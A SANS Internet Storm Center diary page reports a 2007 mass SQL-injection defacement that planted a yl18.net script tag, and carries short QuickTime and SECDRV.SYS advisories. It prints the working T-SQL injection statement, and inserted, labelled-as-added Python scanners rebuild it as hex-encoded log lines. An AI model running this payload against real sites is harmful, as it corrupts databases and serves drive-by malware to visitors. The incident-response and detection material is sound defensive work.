
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-11-06



yl18.net mass defacement

Published: 2007-11-06
Last Updated: 2007-11-07 09:03:51 UTC
by Maarten Van Horenbeeck (Version: 3)
3 comment(s)

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (shown here obfuscated) had been injected into over 40 000 pages across the internet, covering around 150 domains that we know of so far.

script src="hXXp://yl 18.net/0.js"

This script generates a page containing several hidden iframe components. These link to other pages that contain browser-specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti-virus coverage differed greatly between the binaries. Below is the VirusTotal output for one sample:
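For site owners checking whether their own pages carry this kind of injection, the following scanner flags remote script tags on a watched domain and iframes that are sized 0x0 or hidden with inline CSS. It is an added example, not code from the ISC diary; the sample page is constructed, the watched domain and script path are the ones the diary reports, and the iframe destinations are placeholders.

```python
"""Scan HTML for injected remote script tags and hidden iframes.

Added example, not part of the ISC diary. The page below is constructed;
the watched domain and script path are the ones the diary reports, and the
iframe destinations are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains whose scripts should never appear in your own pages (from the diary).
WATCHED_DOMAINS = {"yl18.net"}

# Constructed page: one legitimate script, one injected script, two hidden
# iframes of the kind the injected script generates, and one normal iframe.
SAMPLE_PAGE = """<html><body>
<h1>News</h1><p>Welcome back.</p>
<script src="/js/menu.js"></script>
<script src="http://yl18.net/0.js"></script>
<iframe src="http://example.invalid/a.htm" width="0" height="0"></iframe>
<iframe src="http://example.invalid/b.htm" style="display: none"></iframe>
<iframe src="/player" width="400" height="300"></iframe>
</body></html>"""

ZERO_SIZES = {"0", "0px", "0%"}


def _on_watched_domain(url: str) -> bool:
    """True when the URL's host is a watched domain or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def _is_hidden(attrs: dict) -> bool:
    """Iframes sized 0x0 or hidden via inline CSS are a drive-by pattern."""
    style = attrs.get("style", "").replace(" ", "").lower()
    zero = (attrs.get("width", "").strip() in ZERO_SIZES
            or attrs.get("height", "").strip() in ZERO_SIZES)
    return zero or "display:none" in style or "visibility:hidden" in style


class InjectionScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (kind, src) pairs

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "script" and "src" in a and _on_watched_domain(a["src"]):
            self.findings.append(("remote-script", a["src"]))
        elif tag == "iframe" and _is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))


def scan_html(html: str):
    """Return the list of (kind, src) findings for one page."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, src in scan_html(SAMPLE_PAGE):
        print(f"{kind:14} {src}")
```

Run it over a crawl of your own site rather than over the attacker's pages; a hit on `remote-script` means the database content behind that page has been modified, which is the cleanup problem, not the page itself.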

Engine Version Signatures Result
AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 9.0.0.4 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 6.2.9.117 2007.11.06 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 

This type of widespread attack can incur a serious toll and requires follow-up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the malicious code involved and distribute them to anti-virus vendors so they can build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent the most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is the attacker's actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Malicious domains are, however, generally paid for with fake credit cards, and if this can be identified, the registrar has the legal ability to disable the domain.

These efforts take lots of time, and at this point in time the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross-site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.

UPDATE: A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which had been passed hex-encoded and CAST back into a variable:

-- Build one UPDATE statement per varchar column (systypes.name='varchar')
-- of every user table (sysobjects.xtype='U'), appending the script tag
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
-- Reverse, cut at the first ';', reverse back: drops any trailing statement
-- cut off by the 8000-character limit so the batch still parses
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
-- Execute the generated batch
exec(@m);

This code appends the malicious script tag to every column of type varchar in every user table. It also explains why such a large number of pages per site have been affected.
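Because the statement reaches the server hex-encoded inside a CAST, a plain keyword search of web server logs misses it. The script below, an added example rather than code from the diary, URL-decodes constructed IIS-style log lines, pulls out the hex literal, decodes it as VARCHAR (one byte per character) or NVARCHAR (UTF-16LE, the other common form), and flags payloads containing indicators such as sysobjects or a script tag. The hex literals are generated in the script from the diary's own defanged statement, not copied from a real incident.

```python
"""Find and decode hex-encoded T-SQL injection payloads in web server logs.

Added example, not part of the ISC diary. The log lines are constructed;
the payload they carry is the diary's own statement, URL defanged, so the
hex literals are generated here rather than copied from a real incident.
"""
import re
from urllib.parse import unquote_plus

# The injected statement as shown in the diary (URL defanged).
PAYLOAD = (
    "declare @m varchar(8000);set @m='';"
    "select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'"
    "+b.name+'))+''<script src=\"hxxp://yl 18.net/0.js\"></script>'';' "
    "from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id "
    "and a.xtype='U' and b.xtype=c.xtype and c.name='varchar';exec(@m);"
)

# Constructed IIS-style log lines: a clean request, then the same request with
# the payload hex-encoded as VARCHAR (one byte per char) and as NVARCHAR (UTF-16LE).
LOG_LINES = [
    "2007-11-05 03:12:40 GET /news.asp id=17 200",
    "2007-11-05 03:12:44 GET /news.asp id=17;DECLARE%20@S%20VARCHAR(8000);SET%20@S="
    "CAST(0x" + PAYLOAD.encode("ascii").hex() + "%20AS%20VARCHAR(8000));EXEC(@S);-- 200",
    "2007-11-05 03:12:51 GET /news.asp id=17;DECLARE%20@S%20NVARCHAR(4000);SET%20@S="
    "CAST(0x" + PAYLOAD.encode("utf-16-le").hex() + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
]

# A CAST of a hex literal to a string type is the signature of this encoding trick.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)

# Substrings that make a decoded payload worth an analyst's attention.
INDICATORS = ("sysobjects", "syscolumns", "exec(", "<script", "xp_cmdshell")


def decode_hex_payload(hex_digits: str) -> str:
    """Turn the hex literal back into the SQL text it encodes."""
    if len(hex_digits) % 2:          # SQL Server left-pads odd-length literals
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    # NVARCHAR payloads are UTF-16LE; for ASCII text every second byte is 0x00.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")     # VARCHAR: one byte per character


def scan_log_line(line: str):
    """Return (decoded_payload, indicators_hit) for an injected line, else None."""
    text = unquote_plus(line)        # payloads arrive URL-encoded in the query string
    match = HEX_CAST.search(text)
    if match is None:
        return None
    payload = decode_hex_payload(match.group(1))
    lowered = payload.lower()
    return payload, [tok for tok in INDICATORS if tok in lowered]


def scan_log(lines):
    """Return (line_number, payload, indicators) for every line carrying a hex CAST."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = scan_log_line(line)
        if result is not None:
            hits.append((number, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for number, payload, indicators in scan_log(LOG_LINES):
        print(f"line {number}: indicators={indicators}")
        print("  " + payload[:120] + ("..." if len(payload) > 120 else ""))
```

One caveat for cleanup after a hit: the statement wraps each value in convert(varchar, ...) without a length, and SQL Server defaults that to 30 characters, so any value longer than 30 characters was truncated before the tag was appended. Stripping the tag with REPLACE does not bring that data back; restore the affected tables from a backup taken before the first injected request in the log.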

--
Maarten Van Horenbeeck


Quicktime 7.3 patches serious security bugs

Published: 2007-11-06
Last Updated: 2007-11-06 19:20:59 UTC
by Maarten Van Horenbeeck (Version: 1)
5 comment(s)

Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:

  • A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
  • A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
  • Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
  • Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
  • A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
  • A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).

The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.


Windows XP and 2003 local privilege escalation vulnerability

Published: 2007-11-06
Last Updated: 2007-11-06 13:42:25 UTC
by Maarten Van Horenbeeck (Version: 2)
1 comment(s)

Microsoft has an advisory and a blog entry up on a new vulnerability, CVE-2007-5587, in the Macrovision SECDRV.SYS driver. This file is included with Windows XP and Windows Server 2003.

It appears partial information on the vulnerability and exploit code has been in the wild since mid October, and it is being exploited in a limited number of incidents.

This is a local attack which allows privilege escalation to Ring 0. This means it can be abused by anyone able to introduce and execute code on the system. Depending on the situation this goes beyond shared user environments, as the code could be delivered to a system through a variety of other attack vectors (browser exploits, e-mails, file format exploits).

While an official Microsoft-supplied patch is in the works, Macrovision has released an update on their website which allows you to mitigate this issue.

--
Maarten Van Horenbeeck
